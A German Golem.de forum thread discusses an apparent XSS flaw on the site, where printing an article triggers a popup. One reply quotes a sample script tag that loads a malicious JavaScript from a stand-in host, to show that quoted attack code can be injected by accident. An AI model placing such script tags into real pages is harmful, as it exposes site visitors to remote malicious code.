1. Foren
  2. Kommentare
  3. Security-Forum
  4. Alle Kommentare zum Artikel
  5. › Content Security Policy: Schutz…

@Golem ist selbst betroffen!

Neue Foren im Freiraum! Raumfahrt und freie Software haben jetzt einen Platz, die Games tummeln sich jetzt alle in einem Forum.
  1. Thema

Neues Thema


  1. @Golem ist selbst betroffen!

    Autor: Anonymer Nutzer 13.06.13 - 17:55

    Wenn man versucht, den Artikel zu drucken, bekommt man ein Popup "1".

    Offenbar hat Golem selbst eine XSS-Luecke!

    Glueck nur, dass nicht jeder Artikel schreiben kann .... wie war das mit den freien Autoren....

  2. Re: @Golem ist selbst betroffen!

    Autor: Felix_Keyway 13.06.13 - 18:14

    Na ja, als Lücke würde ich das nicht sehen, der Golem-Mitarbeiter müsste den bösen Code ja einschleusen. Ein Fix wäre aber trotzdem was dolles.

    Ich bin Spezialist der NSA mit dem Spezialgebiet Backdoors in den Linux-Kernel einzuschleusen ;) .

  3. Re: @Golem ist selbst betroffen!

    Autor: Spaghetticode 13.06.13 - 18:22

    Felix_Keyway schrieb:
    --------------------------------------------------------------------------------
    > der Golem-Mitarbeiter müsste den bösen Code ja einschleusen.
    Ich denke mal, das wäre kein Problem. Zum Beispiel, wenn der Golem-Mitarbeiter schreibt:

    „Es wurden hunderte von Seiten gehackt. Die Hacker fügten den Code <script src="http://www.boesesite.com/boesesscript.js" type="text/javascript"></script> in die entsprechenden Seiten ein. Dieser Code lädt ein JavaScript mit Schadfunktionen nach. Webmaster sollten nach diesem Code in der Seite suchen.“

  4. Re: @Golem ist selbst betroffen!

    Autor: Anonymer Nutzer 13.06.13 - 18:42

    Felix_Keyway schrieb:
    --------------------------------------------------------------------------------
    > Na ja, als Lücke würde ich das nicht sehen, der Golem-Mitarbeiter müsste
    > den bösen Code ja einschleusen. Ein Fix wäre aber trotzdem was dolles.


    Mag sein, peinlich ist es trotzdem -- wenn man ueber Sicherheitsluecken schreibt und dann selbst solche Scheunentore offen hat! Wer weiss wer alles Schreibberechtigung bei Golem hat und wie Spaghetticode schon schrieb, kann es auch aus Versehen passieren.

    Ausserdem ist der Druck bei betroffenen Seiten (wie dieser) defekt -- denn ab dem Code wird nicht weiter ausgegeben.



    2 mal bearbeitet, zuletzt am 13.06.13 18:43 durch ThePatrick.

  1. Thema

Neues Thema


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Solution Architect Enterprise Integration & API Platform (m/w / divers)
    Lufthansa Cargo AG, Frankfurt am Main
  2. Softwaretester:in
    Tele Columbus AG, Leipzig
  3. SAP SD/MM Inhouse Consultant (m/w/d)
    Schweizer Electronic AG, Schramberg
  4. Wissenschaftliche Mitarbeiterin / Wissenschaftlicher Mitarbeiter (w/m/d) oder Akademische Rätin ... (m/w/d)
    Universität Passau, Passau

Detailsuche


Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. 499,99€
  2. 399,99€


Haben wir etwas übersehen?

E-Mail an news@golem.de


Bundeswehr: Das Heer will sich nicht abhören lassen
Bundeswehr
Das Heer will sich nicht abhören lassen

Um sicher zu kommunizieren, halten die Landstreitkräfte in NATO-Missionen angeblich ihre Panzer an und verabreden sich "von Turm zu Turm".
Ein Bericht von Matthias Monroy

  1. Bundes-Klimaschutzgesetz Die Bundeswehr wird grüner
  2. 600 Millionen Euro Bundeswehr lässt Funkgeräte von 1982 nachbauen

Verkaufsstart des 9-Euro-Tickets: Was Fahrgäste wissen müssen
Verkaufsstart des 9-Euro-Tickets
Was Fahrgäste wissen müssen

Das 9-Euro-Ticket für den ÖPNV ist beschlossene Sache, Verkehrsverbünde und -unternehmen sehen sich auf den Verkaufsstart in diesen Tagen gut vorbereitet. Doch es gibt viele offene Fragen.

  1. Entlastungspaket Länder stimmen für 9-Euro-Ticket
  2. Biontech Mainz kann 365-Euro-ÖPNV-Ticket dank Corona einführen
  3. Öffentlicher Nahverkehr Linkspartei will 9-Euro-Ticket bis Ende 2022

Geleaktes One Outlook ausprobiert: Wie Outlook Web, nur besser
Geleaktes One Outlook ausprobiert
Wie Outlook Web, nur besser

Endlich wird das schreckliche Mail-Programm in Windows 10 und 11 ersetzt. One Outlook ist zudem mehr, als nur Outlook im Browser.
Ein Hands-on von Oliver Nickel

  1. Office 365 Microsofts neuer Outlook-Client ist geleakt
  2. Interface-Wechsel Outlook für den Mac bekommt neue Oberfläche
  3. Microsoft Die Zeit für Outlook 2007 und 2010 läuft ab

  1. Heimnetze: Die Masche mit dem Nachbarn
    Heimnetze
    Die Masche mit dem Nachbarn

    Heimnetze sind Inseln mit einer schmalen und einsamen Anbindung zum Internet. Warum eine Öffnung dieser strengen Isolation sinnvoll ist.

  2. Cerebras WSE-2: München verbaut riesigen KI-Chip
    Cerebras WSE-2
    München verbaut riesigen KI-Chip

    Als erster Standort in Europa hat das Leibniz-Rechenzentrum (LRZ) ein CS-2-System mit Cerebras' WSE-2 gekauft, welches effizient und schnell ist.

  3. Recht auf Vergessenwerden: Verurteilter Raubmörder gewinnt Klage gegen Google
    Recht auf Vergessenwerden
    Verurteilter Raubmörder gewinnt Klage gegen Google

    Das Recht auf Vergessenwerden gilt auch für Raubmörder. Google muss einen Link auf einen Online-Artikel entfernen.


  1. 09:00

  2. 18:03

  3. 17:45

  4. 17:30

  5. 17:15

  6. 16:50

  7. 16:32

  8. 16:16